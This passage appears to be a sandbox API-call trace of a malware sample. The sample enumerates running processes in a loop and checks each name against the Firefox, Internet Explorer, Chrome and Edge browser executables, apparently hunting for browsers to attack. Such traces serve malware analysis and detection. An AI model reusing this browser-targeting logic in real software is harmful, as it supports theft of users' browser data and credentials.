th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0241.028] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0241.028] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0241.028] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0241.028] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.028] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0241.028] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0241.028] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0241.028] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0241.028] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.028] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0241.029] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0241.029] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0241.029] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0241.029] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.029] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0241.029] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0241.029] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0241.029] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0241.029] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.029] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0241.030] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0241.030] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0241.030] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0241.030] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.030] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0241.030] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0241.030] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0241.030] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0241.030] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.030] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0241.031] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0241.031] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0241.031] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0241.031] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.031] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0241.031] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0241.031] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0241.032] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0241.032] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.032] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0241.032] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0241.032] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0241.032] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0241.032] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.032] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.033] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0241.033] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0241.033] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0241.033] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.033] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.033] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.033] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.033] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.033] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.033] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.034] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0241.034] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0241.034] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0241.034] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.034] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.034] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.034] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.034] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.034] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.034] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.035] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0241.035] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0241.035] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0241.035] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.035] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.035] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.035] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.035] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.035] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.035] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.036] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0241.036] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0241.036] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0241.036] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.036] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.036] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0241.037] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0241.037] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0241.037] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.037] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.037] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.037] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.037] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.037] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.037] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.038] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.038] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.038] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.039] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0241.039] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0241.039] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0241.039] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.039] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0241.039] CloseHandle (hObject=0xd4) returned 1 [0241.039] Sleep (dwMilliseconds=0x3e8) [0242.051] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0242.053] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.054] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0242.054] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0242.054] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0242.054] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0242.054] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.054] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0242.054] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0242.054] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0242.054] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0242.054] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.055] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0242.055] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0242.055] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0242.055] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.055] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.055] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0242.055] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0242.055] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0242.056] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.056] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.056] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0242.056] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0242.056] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0242.056] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.056] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.057] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0242.057] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0242.057] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0242.057] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.057] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.057] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0242.057] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0242.057] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0242.057] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.057] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.058] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0242.058] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0242.058] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0242.058] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.058] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.058] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0242.058] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0242.058] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0242.058] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.058] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0242.059] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0242.059] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0242.059] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0242.059] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.059] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.059] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.060] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.060] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.060] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.061] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.061] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.061] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.062] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.062] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.062] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.062] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.062] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.062] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0242.062] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0242.062] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0242.062] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.062] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.063] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.063] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.063] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.063] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.063] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.064] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.064] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.064] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.064] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.064] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0242.064] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0242.064] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0242.064] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 